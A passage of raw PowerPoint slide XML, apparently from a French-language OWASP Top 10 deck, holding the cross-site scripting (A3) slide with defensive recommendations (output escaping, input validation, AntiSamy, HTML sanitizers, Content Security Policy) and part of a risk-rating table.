                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> URL, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  pour plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’échappement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La validation positive des entrées </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recommandée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>constitue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suffisante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en raison des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>différentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manières</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>traitent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>complète</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>devra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>longueur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>caractères</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, le format et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>règles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> métiers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>données</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> complexes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>considérez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libraire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OWASP’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>AntiSamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Java HTML Sanitizer Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considérez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pour se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protéger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’ensemble</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>votre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> site.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>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A3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="53131" y="1014596"/>
            <a:ext cx="6631997" cy="480859"/>
            <a:chOff x="53131" y="1014596"/>
            <a:chExt cx="6631997" cy="480859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="53131" y="1014596"/>
              <a:ext cx="6631997" cy="480859"/>
              <a:chOff x="53131" y="997424"/>
              <a:chExt cx="6631997" cy="480859"/>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rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnérabilités</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="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err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>t</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>echniques</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53131" y="1280701"/>
                <a:ext cx="1019831" cy="194925"/>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tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agent de menace</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>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Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>m</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>étier</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"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225271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4151815330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="952281"/>
          <a:ext cx="6858000" cy="2528988"/>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1107">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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r>
              <a:tr h="394150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Mise en œuvre</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMUNE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fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODÉRÉ</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Dépend du</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> secteur et de</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
